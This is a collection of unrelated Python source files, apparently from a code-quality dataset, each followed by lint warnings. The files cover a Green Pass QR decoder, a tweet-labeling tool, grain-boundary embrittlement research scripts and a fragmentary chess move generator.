6 from lib.datamapper import DataMapper as data_mapper
7
8
9 class GreenPassDecoder(object):
10 stream_data = None
11
12 def __init__(self, stream_data):
13 self.stream_data = decode(Image.open(stream_data))[0].data
14
15 def decode(self, schema):
16 qr_decoded = self.stream_data[4:]
17 qrcode_data = decompress(b45decode(qr_decoded))
18 (_, (header_1, header_2, cbor_payload, sign)) = flynn_decoder.loads(qrcode_data)
19 data = flynn_decoder.loads(cbor_payload)
20 dm = data_mapper(data, schema)
21 return dm.convert_json()
| 9 - refactor: useless-object-inheritance
18 - warning: unused-variable
18 - warning: unused-variable
18 - warning: unused-variable
9 - refactor: too-few-public-methods
|
1 import json
2 from urllib.request import urlopen
3
4
5 class DataMapperError(Exception):
6 pass
7
8
9 class DataMapper:
10 qr_data = None
11 schema = None
12
13 json = ''
14 new_json = {}
15
16 def _save_json(self, data, schema, level=0):
17
18 for key, value in data.items():
19 try:
20 description = schema[key].get('title') or schema[key].get('description') or key
21 description, _, _ = description.partition(' - ')
22 if type(value) is dict:
23 self.json += '<p>' + (' ' * level) + '<strong>' + description + '</strong></p>'
24 _, _, sch_ref = schema[key]['$ref'].rpartition('/')
25 self._save_json(value, self.schema['$defs'][sch_ref]['properties'], level + 1)
26 elif type(value) is list:
27 self.json += '<p>' + (' ' * level) + '<strong>' + description + '</strong></p>'
28 _, _, sch_ref = schema[key]['items']['$ref'].rpartition('/')
29 for v in value:
30 self._save_json(v, self.schema['$defs'][sch_ref]['properties'], level + 1)
31 else:
32 self.json += '<p>' + (' ' * level) + '<strong>' + description + '</strong>' + ':' + str(
33 value) + '</p>'
34 except KeyError:
35 print('error keys')
36 print(data)
37
38 def __set_schema(self, schema_url):
39 sch = urlopen(schema_url)
40 self.schema = json.load(sch)
41
42 def __init__(self, qr_data, schema_url, params_string=False):
43
44 i = -260
45 j = 1
46
47 if params_string:
48 i = str(i)
49 j = str(j)
50
51 self.json = ''
52 self.qr_data = qr_data[i][j]
53 self.__set_schema(schema_url)
54
55 def convert_json(self):
56 if self.qr_data is None:
57 raise DataMapperError("QR_DATA_IS_WRONG")
58 if self.schema is None:
59 raise DataMapperError("SCHEMA_IS_WRONG")
60 self._save_json(self.qr_data, self.schema['properties'])
61 return self.json
| 18 - warning: bad-indentation
19 - warning: bad-indentation
20 - warning: bad-indentation
21 - warning: bad-indentation
22 - warning: bad-indentation
23 - warning: bad-indentation
24 - warning: bad-indentation
25 - warning: bad-indentation
26 - warning: bad-indentation
27 - warning: bad-indentation
28 - warning: bad-indentation
29 - warning: bad-indentation
30 - warning: bad-indentation
31 - warning: bad-indentation
32 - warning: bad-indentation
34 - warning: bad-indentation
35 - warning: bad-indentation
36 - warning: bad-indentation
39 - refactor: consider-using-with
9 - refactor: too-few-public-methods
|
1 import pandas as pd
2 import csv
3 import os
4 from pandas import ExcelWriter
5
6
7
8 class Tweet:
9 def import_data(self, PATH, type):
10 if type == "xlsx":
11 xl = pd.ExcelFile(PATH)
12 data = xl.parse("Sheet1")
13 if type == "csv":
14 data = pd.read_csv(PATH)
15 # if type == "csv":
16 # with open(PATH, newline='') as f:
17 # reader = csv.reader(f)
18 # data = list(reader)
19 return data
20
21 def label_key2char(self, key):
22 """
23         :param key: the input 0, 1 or 2 from the keyboard
24         :return: fact, opinion, misinformation; if other than 0, 1, 2 return ""
25 """
26 if key == "0":
27 return "fact"
28 elif key == "1":
29 return "opinion"
30 elif key == "2":
31 return "misinformation"
32 else:
33 return ""
34
35 def create_labels(self, df):
36 """
37 :param df: imported data in dataframe format
38 :return: dataframe with added label in ManualLabel column
39 """
40 labels = df["ManualLabel"].tolist()
41 for index, row in df.iterrows():
42 if pd.isna(row["ManualLabel"]):
43 print("===========")
44 print("Tweet Text")
45 print(row["Tweet Text"])
46 print("===========")
47 print("Row Number: "+ str(index))
48 print("Subjective: " + str(row["SubjectivityScores"]))
49 print("Sentiment: " + str(row["FlairSentimentScore"]) + " " + str(row["FlairSentiment"]))
50 print("===========")
51 print('Classify as fact(0), opinion(1), misinformation(2) OR Skip(s), Quit(q): ')
52 print("Your Label:")
53 getch = _Getch()
54 label = getch()
55 label_char = self.label_key2char(label)
56 os.system('cls' if os.name == 'nt' else 'clear')
57 if label == "q":
58 break
59 labels[index] = label_char
60 else:
61 continue
62 df.drop(columns=["ManualLabel"], inplace=True)
63 df["ManualLabel"] = labels
64 return df
65
66 def save_labels(self, tweets_labeled, PATH, type, index):
67 df = tweets_labeled
68 if type == "xlsx":
69 writer = ExcelWriter(PATH)
70 df.to_excel(writer, 'Sheet1', index=index)
71 writer.save()
72 if type == "csv":
73 df.to_csv(PATH, index=index)
74
75
76 class _Getch:
77 """Gets a single character from standard input. Does not echo to the
78 screen."""
79 def __init__(self):
80 try:
81 self.impl = _GetchWindows()
82 except ImportError:
83 self.impl = _GetchUnix()
84
85 def __call__(self): return self.impl()
86
87
88 class _GetchUnix:
89 def __init__(self):
90 import tty, sys
91
92 def __call__(self):
93 import sys, tty, termios
94 fd = sys.stdin.fileno()
95 old_settings = termios.tcgetattr(fd)
96 try:
97 tty.setraw(sys.stdin.fileno())
98 ch = sys.stdin.read(1)
99 finally:
100 termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
101 return ch
102
103
104 class _GetchWindows:
105 def __init__(self):
106 import msvcrt
107
108 def __call__(self):
109 import msvcrt
110 return msvcrt.getch()
111
| 9 - warning: redefined-builtin
19 - error: possibly-used-before-assignment
26 - refactor: no-else-return
66 - warning: redefined-builtin
71 - error: no-member
76 - refactor: too-few-public-methods
90 - warning: unused-import
90 - warning: unused-import
88 - refactor: too-few-public-methods
106 - warning: unused-import
104 - refactor: too-few-public-methods
2 - warning: unused-import
|
1 # This is a sample Python script.
2
3 # Press ⌃R to execute it or replace it with your code.
4 # Press Double ⇧ to search everywhere for classes, files, tool windows, actions, and settings.
5 from utils import Tweet
6
7 def print_hi(name):
8 # Use a breakpoint in the code line below to debug your script.
9 print(f'Hi, {name}') # Press ⌘F8 to toggle the breakpoint.
10
11
12 # Press the green button in the gutter to run the script.
13 if __name__ == '__main__':
14 print_hi('Start Labeling')
15
16 # See PyCharm help at https://www.jetbrains.com/help/pycharm/
17 #PATH = "Jun/test.csv"
18 PATH = "Kebby/MarchNonExpertsManualLabel3.csv" #first save the .xlsx file as .csv
19
20 tweet = Tweet()
21 tweets = tweet.import_data(PATH, "csv")
22 tweets_labeled = tweet.create_labels(tweets)
23 tweet.save_labels(tweets_labeled, PATH, "csv", index=False)
| Clean Code: No Issues Detected
|
1 # ---------------------------------------------------------------------------
2 # ---------------------------------------------------------------------------
3 # This code is a supplement for the journal article titled:
4 # "Spectrum of Embrittling Potencies and Relation to Properties of
5 # Symmetric-Tilt Grain Boundaries"
6 # ------------------
7 # This code performs the following tasks:
8 # 1) Reads in Fi, Xi, Pi from the previous step
9 # 2) Calculates site-specific properties that are shown in Table 2 and Fig. 6
10 # 3) Calculates collective-behavior properties that are shown in Table 3 and Fig. 5
11 # 4) Generates all data frames for plotting
12 # --- Definitions and Abbreviations --
13 # GB: Grain boundary
14 # FS: Free surface
15 # ------------------
16 # Authors: Doruk Aksoy (1), Rémi Dingreville (2), Douglas E. Spearot (1,*)
17 # (1) University of Florida, Gainesville, FL, USA
18 # (2) Center for Integrated Nanotechnologies, Sandia National Laboratories,
19 # Albuquerque, NM, USA
20 # (*) dspearot@ufl.edu
21 # ---------------------------------------------------------------------------
22 # ---------------------------------------------------------------------------
23 #%% Imports
24 import numpy as np
25 import pandas as pd
26 from os import listdir,path
27
28 # %% Define functions
29 def getNumOfAtoms(file_path, file_name):
30 '''
31 Obtain number of atoms from the file.
32
33 Parameters
34 ----------
35 file_path : File path
36 file_name : Name of the file
37
38 Returns
39 -------
40 Number of atoms
41
42 '''
43 with open(path.join(file_path,file_name), 'r') as atoms_file:
44 # Number of atoms is equal to number of lines without the header
45 lineCount = 0
46 for line in atoms_file:
47 lineCount += 1
48 return int(lineCount)-1
49
50 def getEnergies(file_path, file_name, arr):
51 '''
52 Function to obtain energies from file
53
54 Parameters
55 ----------
56 file_path : File path
57 file_name : Name of the file
58 arr : Array to write energies
59
60 '''
61 with open(path.join(file_path,file_name), 'r') as results_file:
62 for ind,line in enumerate(results_file):
63 # Skip the header
64 if "#" not in line:
65 line = line.split()
66 for j in range(int(np.size(line))):
67 arr[int(ind)-1,j] = line[j]
68
69 def segEngOcc(energies,col_num,NDIGITS):
70 '''
71     Find the unique segregation energies and their numbers of occurrences
72
73 Parameters
74 ----------
75 energies : Energies obtained from simulations
76 col_num : Segregation energy column number
77 NDIGITS : Number of digits to consider when looking at unique segregation
78 energies
79
80 Returns
81 -------
82 DE_seg_i_GB : Segregation energy of site type i
83     N_hat_i_GB : Number of occurrences of the segregation energy of site type i
84 num_site_types : Total number of unique site types
85 site_type_ind : Indices of matching energies between DE_seg_i_GB array and energies array
86
87 '''
88
89     # Round energies by the given number of digits, and then find the number of unique energies and the number of occurrences
90 DE_seg_i_GB,N_hat_i_GB = np.unique(np.round(energies[np.nonzero(energies[:,col_num]),col_num],NDIGITS), return_counts=True)
91 # Number of site types
92 num_site_types = int(np.size(DE_seg_i_GB))
93 # We will use the site_type_ind list to match the site types between GBs and FSs.
94 site_type_ind = []
95 # Now that we have matched the rounded energies, find originals and put back into DE_seg_i_GB array
96 for i in range(num_site_types):
97 site_type_ind.append(np.where(np.round(energies[np.nonzero(energies[:,col_num]),col_num],NDIGITS) == DE_seg_i_GB[i])[1][0])
98 DE_seg_i_GB[i] = energies[site_type_ind[i],col_num]
99 return (DE_seg_i_GB, N_hat_i_GB, num_site_types, site_type_ind)
100 # %% MAIN
101 # Read in data frames
102 df_Pop = pd.read_csv("../Results/Pop.csv",index_col = 0).astype(float)
103
104 # From data frame to arrays
105 delta_E_seg_GB_i = np.array(df_Pop['delta_E_seg_GB_i'])
106 Pi = np.array(df_Pop['Pi'])
107
108 # Round by this number when comparing energies
109 NDIGITS = 3
110
111 # Perform simulations for all given models
112 allSims = listdir('../GBs/')
113
114 # %% Create a data frame to store all results
115 # Define columns (three properties shown in Fig. 5)
116 columns_all = ["DE_hat_b","PR_hat_GB","E_hat_b"]
117 # Tilt and GB normals as indices of the data frame
118 tilt_axes = [sim.split('_')[0] for sim in allSims]
119 GB_normals = [sim.split('_')[1] for sim in allSims]
120 # Levels required for a multi index data frame
121 levels_all = list(zip(*[tilt_axes, GB_normals]))
122 # Define indices
123 index_all = pd.MultiIndex.from_tuples(levels_all, names=['Tilt', 'Normal'])
124 # Initialize the data frame
125 df_all = pd.DataFrame(index = index_all, columns=columns_all)
126
127 #%% For each sample
128 for indSim,sim in enumerate(allSims):
129
130 # Obtain GB normal and tilt axes from the folder names
131 GB_normal = str(sim.split('_')[1])
132 GB_tilt = str(sim.split('_')[0])
133
134 # Model path
135 model_path = path.join("../GBs/", str(sim) + "/")
136
137 # Read in number of GB atoms considered in the simulation
138 N_hat_GB = getNumOfAtoms(path.join(model_path, "Results/"),"GBEnergies.dat")
139
140 # Initialize an array for energies of individual sites in GB models
141 GBenergies = np.zeros((N_hat_GB,5))
142 # Initialize an array for energies of individual sites in FS models
143 FSenergies = np.zeros((N_hat_GB,5))
144
145 try:
146 # Read energies for each sample
147 getEnergies(path.join(model_path, "Results/"),"GBEnergies.dat",GBenergies)
148 getEnergies(path.join(model_path, "Results/"),"FSEnergies.dat",FSenergies)
149
150 # Sort by atom ID
151 GBenergies = GBenergies[np.argsort(GBenergies[:,0]),:]
152 FSenergies = FSenergies[np.argsort(FSenergies[:,0]),:]
153
154         # Weed out non-matching simulations (if one of the two simulations per atom ID failed)
155 # Find out the intersection vector of two arrays, then delete rows with different atom IDs
156 for ind,val in enumerate(np.asarray(np.intersect1d(GBenergies[:,0],FSenergies[:,0]),dtype=int)):
157 if (not np.searchsorted(GBenergies[:,0],val) == ind):
158 GBenergies = np.delete(GBenergies,ind,0)
159 if (not np.searchsorted(FSenergies[:,0],val) == ind):
160 FSenergies = np.delete(FSenergies,ind,0)
161
162 # Update number of atoms
163 N_hat_GB = np.size(GBenergies,axis=0)
164
165 # Find unique segregation energies and their number of occurences using segEngOcc function
166 DE_seg_i_GB, N_hat_i_GB, num_site_types_GB, site_type_ind_GB = segEngOcc(GBenergies,4,NDIGITS)
167 # Site type indices should be preserved after cleavage (See Section 4)
168 DE_seg_i_FS = FSenergies[site_type_ind_GB,4]
169 # Embrittling potencies
170 DE_b_i = GBenergies[site_type_ind_GB,4]-FSenergies[site_type_ind_GB,4]
171
172 # Site occupancies
173 P_bar_i_GB = np.zeros(num_site_types_GB)
174
175 # Obtain P_bar_i_GB from the population (closest value)
176 for i in range(num_site_types_GB): P_bar_i_GB[i] = Pi[(np.abs(delta_E_seg_GB_i - DE_seg_i_GB[i])).argmin()]
177
178 # Rescaled site occupancy for each site type i
179 PR_hat_i_GB = P_bar_i_GB/np.sum(np.multiply(P_bar_i_GB, N_hat_i_GB))
180
181 # Site specific embrittling estimator
182 E_hat_b_i = np.multiply(PR_hat_i_GB,DE_b_i)
183
184 # Sample embrittling estimator
185 E_hat_b = np.sum(np.multiply(np.multiply(PR_hat_i_GB,N_hat_i_GB),DE_b_i))/(N_hat_GB)
186
187 # Write properties to the all results data frame
188 df_all['DE_hat_b'][GB_tilt,GB_normal] = np.sum(np.mean(np.multiply(DE_b_i,N_hat_i_GB)))/N_hat_GB
189 df_all['PR_hat_GB'][GB_tilt,GB_normal] = np.sum(np.mean(np.multiply(PR_hat_i_GB,N_hat_i_GB)))/N_hat_GB
190 df_all['E_hat_b'][GB_tilt,GB_normal] = E_hat_b
191
192 except:
193 print(indSim+1,sim,"Properties not calculated!")
194 continue
195
196 # %% To csv
197 df_all.to_csv("../Results/AllResults.csv") | 43 - warning: unspecified-encoding
46 - warning: unused-variable
62 - warning: redefined-outer-name
61 - warning: unspecified-encoding
69 - warning: redefined-outer-name
90 - warning: redefined-outer-name
90 - warning: redefined-outer-name
96 - warning: redefined-outer-name
192 - warning: bare-except
|
1 # ---------------------------------------------------------------------------
2 # ---------------------------------------------------------------------------
3 # This code is a supplement for the journal article titled:
4 # "Spectrum of Embrittling Potencies and Relation to Properties of
5 # Symmetric-Tilt Grain Boundaries"
6 # ------------------
7 # This code performs the following tasks:
8 # 1) Obtains density of states from the previous step
9 # 2) Calculates Xi and Pi (check the paper for definitions) at the population
10 # level (Fig.4)
11 # 3) Write Xi and Pi calculated in this step to a data frame, to be processed
12 # at the sample level
13 # --- Definitions and Abbreviations --
14 # GB: Grain boundary
15 # FS: Free surface
16 # ------------------
17 # Authors: Doruk Aksoy (1), Rémi Dingreville (2), Douglas E. Spearot (1,*)
18 # (1) University of Florida, Gainesville, FL, USA
19 # (2) Center for Integrated Nanotechnologies, Sandia National Laboratories,
20 # Albuquerque, NM, USA
21 # (*) dspearot@ufl.edu
22 # ---------------------------------------------------------------------------
23 # ---------------------------------------------------------------------------
24 #%% Imports
25 import numpy as np
26 import pandas as pd
27
28 # %% Define functions
29 def calcXtot(delta_E_seg_GB_i,Fi,X_bulk):
30 '''
31 Calculate total solute concentration from bulk solute concentration.
32
33 Parameters
34 ----------
35 X_bulk : Bulk solute concentration
36 delta_E_seg_GB_i : All segregation energies for each site type i
37 Fi : Density of states for each site type within the population
38
39 Returns
40 -------
41 X_tot : Total solute concentration within the population
42
43 '''
44 # Number of site types
45 n_site_types = np.size(Fi,axis=0)
46 # Initialize and calculate the probability distribution function for each
47 # site type i with the given bulk concentration
48 Xi_with_bulk = np.zeros(n_site_types)
49 for i in range(n_site_types): Xi_with_bulk[i] = 1 / (1 + ((1 - X_bulk) / X_bulk) * np.exp( delta_E_seg_GB_i[i] / (kB * T)))
50 # Calculate the effective solute concentration
51 X_bar = np.sum(Fi * Xi_with_bulk)
52 # Return the total solute concentration
53 return ((1 - f_int) * X_bulk + f_int * X_bar)
54
55 def fromXtotToXbulk(delta_E_seg_GB_i,Fi,X_tot,tol):
56 '''
57 Calculate bulk solute concentration from total solute concentration using
58 midpoint trial and improvement solver.
59
60 Parameters
61 ----------
62 delta_E_seg_GB_i : All segregation energies for each site type i
63 Fi : Density of states for each site type
64 X_tot : Total solute concentration
65 tol : Tolerance
66
67 Returns
68 -------
69 If a result is found, return X_bulk.
70
71 '''
72 # Initial lower and upper estimates
73 x_lo = 0.0
74 x_hi = X_tot*2
75 # Initial guess
76 x_0 = (x_lo + x_hi)/2
77 # Calculate a trial value using calcXtot function
78 X_tot_trial = calcXtot(delta_E_seg_GB_i,Fi,x_0)
79 # Initialize iteration counter
80 iter_count = 0
81 # Maximum number of iterations
82 max_iter = 100
83 # Check if the result is within the tolerance and number of iterations
84 # is less than the maximum value
85 while((np.abs(X_tot_trial - X_tot) > tol) and (iter_count < max_iter)):
86 if(X_tot_trial > X_tot):
87 x_hi = x_0
88 x_0 = (x_hi + x_lo)/2 # Next guess
89 else:
90 x_lo = x_0
91 x_0 = (x_hi + x_lo)/2 # Next guess
92 # Calculate the new trial value using calcXtot function
93 X_tot_trial = calcXtot(delta_E_seg_GB_i,Fi,x_0)
94 # Increment the iteration counter
95 iter_count +=1
96 # Check whether a total solute concentration can be found
97 if (iter_count == max_iter):
98 print("Could not find a value.")
99 return (0)
100 else:
101 return (x_0)
102
103 def calcPopProp(delta_E_seg_GB_i,Fi,X_tot):
104 '''
105 Calculate population properties.
106
107 Parameters
108 ----------
109 delta_E_seg_GB_i : All segregation energies for each site type i
110 Fi : Density of states for each site type
111 X_tot : Total solute concentration
112
113 Returns
114 -------
115 X_bulk : Bulk solute concentration
116 Xi : Fraction of occupied type i sites
117 Pi : Solute occupancy density
118 X_bar : Effective solute concentration
119 delta_E_bar_seg_GB_i : Effective segregation energy per site type i
120 delta_E_bar_seg_GB : Total effective segregation energy
121
122 '''
123 # Calculate the bulk concentration using fromXtotToXbulk function
124 X_bulk = fromXtotToXbulk(delta_E_seg_GB_i,Fi,X_tot,1E-4)
125 # Raise an exception if a bulk solute concentration cannot be calculated with given total solute concentration
126 if (X_bulk==0):
127 raise Exception('Error: Cannot calculate a bulk solute concentration with given total solute concentration.')
128 # Calculate the site specific probability distribution function and convert it to numpy array
129 Xi = [(1/(1+ ((1-X_bulk)/X_bulk) * np.exp( delta_E_seg_GB_i[i] / (kB*T)))) for i in range(np.size(delta_E_seg_GB_i))]
130 Xi = np.array(Xi)
131 # Site occupancy
132 Pi = Fi * Xi
133 # Effective solute concentration
134 X_bar = np.sum(Pi)
135 # Effective segregation energy for each site type i
136 delta_E_bar_seg_GB_i = (1/(X_bar*(1-X_bar))) * (Fi * delta_E_seg_GB_i * Xi * (1-Xi))
137 # Effective segregation energy
138 delta_E_bar_seg_GB = np.sum(delta_E_bar_seg_GB_i)
139 # Return all calculated properties
140 return (X_bulk,Xi,Pi,X_bar,delta_E_bar_seg_GB_i,delta_E_bar_seg_GB)
141
142 # %% MAIN
143 # Read-in normalized density of states (Format: Index/Energies/Frequencies)
144 df_Fi_GB = pd.read_csv("../Results/Fi_GB.csv",index_col = 0)
145
146 # Segregation energies for each site type i
147 delta_E_seg_GB_i = np.array(df_Fi_GB['Energy'])
148 # Density of states
149 Fi = np.array(df_Fi_GB['Freq'])
150
151 # %% Variables
152 # Total solute concentration
153 X_tot = 15/100 # no of solute atoms/no of GB atoms
154 # Fraction of interface sites to all segregation sites
155 f_int = 0.162
156 # Boltzmann Constant in eV K-1
157 kB = 0.00008617333262
158 # Temperature
159 T = 300 # K
160
161 # %% Calculate properties corresponding to the GB population using calcPopProp function
162 (X_bulk,Xi,Pi,X_bar,delta_E_bar_seg_GB_i,delta_E_bar_seg_GB) = calcPopProp(delta_E_seg_GB_i,Fi,X_tot)
163
164 # %% Create a data frame with the population properties
165 df_Pop = pd.DataFrame(np.transpose([delta_E_seg_GB_i, Fi, Xi, Pi]),columns=['delta_E_seg_GB_i','Fi','Xi','Pi']).astype(float)
166 # Convert data frame to csv
167 df_Pop.to_csv("../Results/Pop.csv")
| 29 - warning: redefined-outer-name
29 - warning: redefined-outer-name
29 - warning: redefined-outer-name
51 - warning: redefined-outer-name
55 - warning: redefined-outer-name
55 - warning: redefined-outer-name
55 - warning: redefined-outer-name
97 - refactor: no-else-return
103 - warning: redefined-outer-name
103 - warning: redefined-outer-name
103 - warning: redefined-outer-name
124 - warning: redefined-outer-name
129 - warning: redefined-outer-name
132 - warning: redefined-outer-name
134 - warning: redefined-outer-name
136 - warning: redefined-outer-name
138 - warning: redefined-outer-name
127 - warning: broad-exception-raised
|
1 import pickle, random
2 t = open("test.info", "wb")
3 t.truncate(0)
4 dic = {}
5 for x in range(0, 10):
6 randomnum = random.randint(0, 100)
7 print(randomnum)
8 dic[randomnum] = bool(input("1/0 big "))
9 pickle.dump(dic, t)
10 t.close()
| 6 - warning: bad-indentation
7 - warning: bad-indentation
8 - warning: bad-indentation
2 - refactor: consider-using-with
|
1 import copy
2 import pickle
3 import random
4 import sys
5 print(" Max testing intelligence")
6 print("a simple AI simulation")
7 print("made with python version "+sys.version)
8 file = open(r"test.info", mode = "rb")
9 try:
10 testdict = pickle.load(file)
11 except EOFError:
12 pass
13 file.close()
14 global agentnum
15 agentnum = int(input("agents for MAX"))
16 class Agent(object):
17 def __init__(self, lineval):
18 self.lineval = lineval
19 self.score = 0
20 def test(self, testsheet):
21 answer = []
22 for x in testsheet:
23 if round(x) >= self.lineval:
24 answer.append(True)
25 else:
26 answer.append(False)
27 return answer
28 def reproduce(self, other):
29 us=other
30 usnums = []
31 for x in us:
32 usnums.append(x.score)
33 if usnums.index(max(usnums)) == us.index(self):
34 agentsnew = []
35 for x in range(0, agentnum-1):
36 agentsnew.append(copy.copy(self))
37             agentsnew[len(agentsnew)-1].lineval += random.randint(-1, 1)
38 agentsnew.append(self)
39 return agentsnew
40 else:
41 try:
42 return []
43 finally:
44 del self
45
46 iternum = int(input("iteration count"))
47 testque = list(testdict.keys())
48 testans = list(testdict.values())
49 agents=[Agent(random.randint(0, 100)), Agent(random.randint(0, 100)), Agent(random.randint(0, 100))]
50 for z in agents:
51 print(z.lineval)
52 for x in range(0, iternum):
53 for i in agents:
54 right = 0
55 testresults = i.test(testque)
56 for j in testresults:
57 if j == testans[testresults.index(j)]:
58 right += 1
59 i.score = right
60 for y in agents:
61 r = i.reproduce(agents)
62 if len(r) != 0:
63             print("iteration "+str(x+1)+" successful")
64 agents = r
65 for nz in agents:
66 print(nz.lineval)
67 print("done")
68 while True:
69 hinputnum = int(input("number"))
70 if random.choice(agents).lineval >= hinputnum:
71 print("small number")
72 else:
73 print("big number")
| 14 - warning: global-at-module-level
16 - refactor: useless-object-inheritance
22 - warning: redefined-outer-name
31 - warning: redefined-outer-name
33 - refactor: no-else-return
8 - refactor: consider-using-with
|
1 Rook, King, Pawn, Queen, Horse = ['r', 'k', 'p', 'q', 'h']
2
3 if material == Material.Queen:
4 moves = self.queen_move(turn, location)
5 if moves != []:
6 total_moves.extend(moves)
7 if material == Material.Horse:
8 moves = self.horse_move(turn, location)
9 if move != []:
10 total_moves.extend(moves)
11
12 def horse_move(self, turn, location_1):
13 moves = []
14 x = location_1[0]
15 y = location_1[1]
16 if y > 1:
17 y1 = y - 2
18 if x != 0:
19 x1 = x - 1
20 location_2 = (x1, y1)
21 if self.check_occupied_by_self(location_2) == 0:
22 move = (location_1, location_2)
23 moves.append(move)
24 if x != 8:
25 x1 = x + 1
26 location_2 = (x1, y1)
27 if self.check_occupied_by_self(location_2) == 0:
28 move = (location_1, location_2)
29 moves.append(move)
30 if y < 6:
31 y1 = y + 2
32 if x != 0:
33 x1 = x - 1
34 location_2 = (x1, y1)
35 if self.check_occupied_by_self(location_2) == 0:
36 move = (location_1, location_2)
37 moves.append(move)
38 if x != 8:
39 x1 = x + 1
40 location_2 = (x1, y1)
41 if self.check_occupied_by_self(location_2) == 0:
42 move = (location_1, location_2)
43 moves.append(move)
44 if x > 1:
45 x1 = x - 2
46 if y != 0:
47 y1 = y - 1
48 location_2 = (x1, y1)
49 if self.check_occupied_by_self(location_2) == 0:
50 move = (location_1, location_2)
51 moves.append(move)
52 if y != 8:
53 y1 = y + 1
54 location_2 = (x1, y1)
55 if self.check_occupied_by_self(location_2) == 0:
56 move = (location_1, location_2)
57 moves.append(move)
58 if x < 6:
59 x1 = x + 2
60 if y != 0:
61 y1 = y - 1
62 location_2 = (x1, y1)
63 if self.check_occupied_by_self(location_2) == 0:
64 move = (location_1, location_2)
65 moves.append(move)
66 if y != 8:
67 y1 = y + 1
68 location_2 = (x1, y1)
69 if self.check_occupied_by_self(location_2) == 0:
70 move = (location_1, location_2)
71 moves.append(move)
72 return moves
73
74 def queen_move(self, turn, location_1):
75 moves = []
76 location_2 = list(location_1)
77 rook_moves = self.rook_move(turn,location_1)
78 moves.extend(rook_moves)
79 while location_2[0] != 7 and location_2[1] != 0:
80 location_2[0] += 1
81 location_2[1] -= 1
82 if self.check_occupied_by_self(tuple(location_2)) == 0:
83 moves.append([location_1, tuple(location_2)])
84 else:
85 break
86 if self.check_occupied_by_other(tuple(location_2)) == 1:
87 break
88 location_2 = list(location_1)
89 while location_2[0] != 7 and location_2[1] != 7:
90 location_2[0] += 1
91 location_2[1] += 1
92 if self.check_occupied_by_self(tuple(location_2)) == 0:
93 moves.append([location_1, tuple(location_2)])
94 else:
95 break
96 if self.check_occupied_by_other(tuple(location_2)) == 1:
97 break
98 location_2 = list(location_1)
99 while location_2[0] != 0 and location_2[1] != 7:
100 location_2[0] -= 1
101 location_2[1] += 1
102 if self.check_occupied_by_self(tuple(location_2)) == 0:
103 moves.append([location_1, tuple(location_2)])
104 else:
105 break
106 if self.check_occupied_by_other(tuple(location_2)) == 1:
107 break
108 location_2 = list(location_1)
109 while location_2[0] != 0 and location_2[1] != 0:
110 location_2[0] -= 1
111 location_2[1] -= 1
112 if self.check_occupied_by_self(tuple(location_2)) == 0:
113 moves.append([location_1, tuple(location_2)])
114 else:
115 break
116 if self.check_occupied_by_other(tuple(location_2)) == 1:
117 break
118 return moves
119
120
121 if material == Material.Queen:
122 if side == Side.White:
123 score += 50
124 else:
125 score -= 50 | 13 - warning: bad-indentation
14 - warning: bad-indentation
15 - warning: bad-indentation
16 - warning: bad-indentation
17 - warning: bad-indentation
18 - warning: bad-indentation
19 - warning: bad-indentation
20 - warning: bad-indentation
21 - warning: bad-indentation
22 - warning: bad-indentation
23 - warning: bad-indentation
24 - warning: bad-indentation
25 - warning: bad-indentation
26 - warning: bad-indentation
27 - warning: bad-indentation
28 - warning: bad-indentation
29 - warning: bad-indentation
30 - warning: bad-indentation
31 - warning: bad-indentation
32 - warning: bad-indentation
33 - warning: bad-indentation
34 - warning: bad-indentation
35 - warning: bad-indentation
36 - warning: bad-indentation
37 - warning: bad-indentation
38 - warning: bad-indentation
39 - warning: bad-indentation
40 - warning: bad-indentation
41 - warning: bad-indentation
42 - warning: bad-indentation
43 - warning: bad-indentation
44 - warning: bad-indentation
45 - warning: bad-indentation
46 - warning: bad-indentation
47 - warning: bad-indentation
48 - warning: bad-indentation
49 - warning: bad-indentation
50 - warning: bad-indentation
51 - warning: bad-indentation
52 - warning: bad-indentation
53 - warning: bad-indentation
54 - warning: bad-indentation
55 - warning: bad-indentation
56 - warning: bad-indentation
57 - warning: bad-indentation
58 - warning: bad-indentation
59 - warning: bad-indentation
60 - warning: bad-indentation
61 - warning: bad-indentation
62 - warning: bad-indentation
63 - warning: bad-indentation
64 - warning: bad-indentation
65 - warning: bad-indentation
66 - warning: bad-indentation
67 - warning: bad-indentation
68 - warning: bad-indentation
69 - warning: bad-indentation
70 - warning: bad-indentation
71 - warning: bad-indentation
72 - warning: bad-indentation
75 - warning: bad-indentation
76 - warning: bad-indentation
77 - warning: bad-indentation
78 - warning: bad-indentation
79 - warning: bad-indentation
80 - warning: bad-indentation
81 - warning: bad-indentation
82 - warning: bad-indentation
83 - warning: bad-indentation
84 - warning: bad-indentation
85 - warning: bad-indentation
86 - warning: bad-indentation
87 - warning: bad-indentation
88 - warning: bad-indentation
89 - warning: bad-indentation
90 - warning: bad-indentation
91 - warning: bad-indentation
92 - warning: bad-indentation
93 - warning: bad-indentation
94 - warning: bad-indentation
95 - warning: bad-indentation
96 - warning: bad-indentation
97 - warning: bad-indentation
98 - warning: bad-indentation
99 - warning: bad-indentation
100 - warning: bad-indentation
101 - warning: bad-indentation
102 - warning: bad-indentation
103 - warning: bad-indentation
104 - warning: bad-indentation
105 - warning: bad-indentation
106 - warning: bad-indentation
107 - warning: bad-indentation
108 - warning: bad-indentation
109 - warning: bad-indentation
110 - warning: bad-indentation
111 - warning: bad-indentation
112 - warning: bad-indentation
113 - warning: bad-indentation
114 - warning: bad-indentation
115 - warning: bad-indentation
116 - warning: bad-indentation
117 - warning: bad-indentation
118 - warning: bad-indentation
3 - error: undefined-variable
3 - error: undefined-variable
4 - error: undefined-variable
4 - error: undefined-variable
4 - error: undefined-variable
6 - error: undefined-variable
7 - error: undefined-variable
7 - error: undefined-variable
8 - error: undefined-variable
8 - error: undefined-variable
8 - error: undefined-variable
9 - error: undefined-variable
10 - error: undefined-variable
13 - warning: redefined-outer-name
12 - refactor: too-many-branches
12 - refactor: too-many-statements
12 - warning: unused-argument
75 - warning: redefined-outer-name
74 - refactor: too-many-branches
121 - error: undefined-variable
121 - error: undefined-variable
122 - error: undefined-variable
122 - error: undefined-variable
123 - error: undefined-variable
|
1 #!python2
2
3 from __future__ import division, print_function
4
5 ################################
6 # ZSB - Opdracht 2 #
7 # umi_parameters.py #
8 # 16/06/2017 #
9 # #
10 # Anna Stalknecht - 10792872 #
11 # Claartje Barkhof - 11035129 #
12 # Group C #
13 # #
14 ################################
15
16 class UMI_parameters:
17 def __init__(self):
18 # Specifications of UMI
19 # Zed
